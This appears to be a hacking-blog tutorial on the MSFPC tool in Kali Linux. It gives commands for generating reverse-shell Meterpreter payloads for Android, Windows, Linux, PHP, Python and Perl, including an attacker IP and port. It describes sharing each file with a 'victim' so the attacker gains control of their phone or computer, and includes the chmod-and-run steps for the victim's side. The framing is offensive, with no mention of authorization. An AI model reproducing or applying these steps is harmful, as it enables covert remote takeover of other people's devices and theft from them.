Hey Folks, in this tutorial we will talk about the MSFPC tool which is already installed in Kali Linux. If you know about the Msf-venom then you can easily understanding because it is alternative. In msf-venom you have to create the payload yourself and with the msfpc tool you can create multiple payloads by single click which is different for these tools.
MSFvenom Payload Creator (MSFPC) is a automatic tool that generates multiple types of payloads, based on user-selected options. The idea is to be as simple as possible (using as few as one option) to produce a payload. Fully automating msfvenom & Metasploit is the end goal.
Author : g0tmi1k
Lets do it π !!
Now first we will introduce you the features of this tool.
<TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
TYPE : Apk, Window, Asp, Java, Powershell etc.
DOMAIN/IP : Interface or IP Address.
CMD : is a standard/native command prompt/terminal to interactive with.
MSF : is a custom cross platform shell, gaining the full power of Metasploit.
BIND : opens a port on the target side, and the attacker connects to them.
REVERSE : makes the target connect back to the attacker. The attacker needs an open port.
STAGED : splits the payload into parts, making it smaller but dependent on Metasploit.
STAGELESS : is the complete standalone payload. More βstableβ.
TCP : is the standard method to connecting back. This is the most compatible with TYPES as its RAW.
HTTP : makes the communication appear to be HTTP traffic (unencrypted)
HTTPS : makes the communication appear to be (encrypted) HTTP traffic using as SSL.
FIND_PORT : will attempt every port on the target machine, to find a way out.
LOOP : will just create one of each.
VERBOSE : will display all information.
If you want to download this tool for Ubuntu operating system or other OS then you can download it by using the following command.
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
chmod 0755 /usr/local/bin/msfpc
First create the payload for android platform by using the following command. When we enter the following command it will ask us to choose the interface in that case we can select as our need. It has select the port 443 by default but we can change.
Usage π msfpc < TYPE >
msfpc APK
You can see that the payload is made by less effort. After create the payload we need to execute the βmsfconsoleβ command which is highlighted on above.
As well as we need to share our file to the victim that we can share according to your. But it also provide a python file share just below of msfvenom command that we can run in separate terminal.
Done ! when victim will download our payload and run it, then we can control his android phone by multi handler.
For the window platform also we will repeat the process as given above. But now we will give our localhost address and port number in advance.
Usage π msfpc < TYPE > < IP > < PORT >
msfpc EXE 192.168.0.103 4444
Once the payload created it gives the python file share and multi handler command that we have to execute together in separate terminal.
Aright ! The meterpreter will come here as soon as the victim drives our payload.
Now we will create the payload for linux platform by using the following command. But in this execution we will choose the Ethernet (eht0) interface which is our localhost address.
Usage π msfpc < TYPE > < IP/ETH0 > < PORT >
msfpc bash etho 4445
As we know that we have to give some permission to Linux shell script before execution.
chmod 777 bash-shell-staged-reverse-tcp-4445.sh
./bash-shell-staged-reverse-tcp-4445.sh
After doing all this the meterpreter will come here when the victim runs the payload.
Now we will create the payload again for linux platform but the difference between the previous payload and this one is that the extension of the first payload was β.shβ and the elf of this one.
Usage π msfpc < TYPE > < IP/ETH0 > < PORT >
msfpc Linux 192.168.0.103 4445
Victim need to give chmod permissions to this linux program.
chmod 777 linux-shell-staged-reverse-tcp-4445.elf
./linux-shell-staged-reverse-tcp-4445.elf
Nice ! As soon victim run the payload the meterpreter comes to the attacker.
Letβs try to create the payload in php by using the following command. As we know php setup is required on web server, windows or linux to execute php script.
Usage π msfpc < TYPE > < IP/ETH0 > < PORT >
msfpc PHP eth0 4444
Some permissions have to be granted after downloads the payload.
chmod 777 php-meterpreter-staged-reverse-tcp-4444.php
php php-meterpreter-staged-reverse-tcp-4444.php
Done ! The meterpreter will come here after run the payload.
As we know python is an interpreted, high-level, general-purpose programming language and almost all OS systems come configured. Hence we will create our payload for python platform by using the following command.
Usage π msfpc < TYPE > < IP/ETH0 > < PORT >
msfpc Python 192.168.0.103 4444
When the target runs a β.pyβ extension files in its OS, meterpreter will immediately move here.
Perl is a family of two high-level, general-purpose, interpreted, dynamic programming languages which also comes the linux operating system. Lets try to make payload for perl platform by using the given command.
Usage π msfpc < TYPE > < IP/ETH0 > < PORT >
msfpc perl eth0 4444
The meterpreter will comes here as soon as victim run the payload with perl command.
Loop which allows code to be executed repeatedly, exactly just like that we can create one payload for each platform by using the given command.
msfpc verbose loop eth0.
Stagales are a full standalone payload that is more stable than a staged payload and helps maintain a meterpreter. We can simply create the s tageless payload by using the following command.
msfpc stageless APK 192.168.0.103 4444
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…
Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…
Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
This website uses cookies.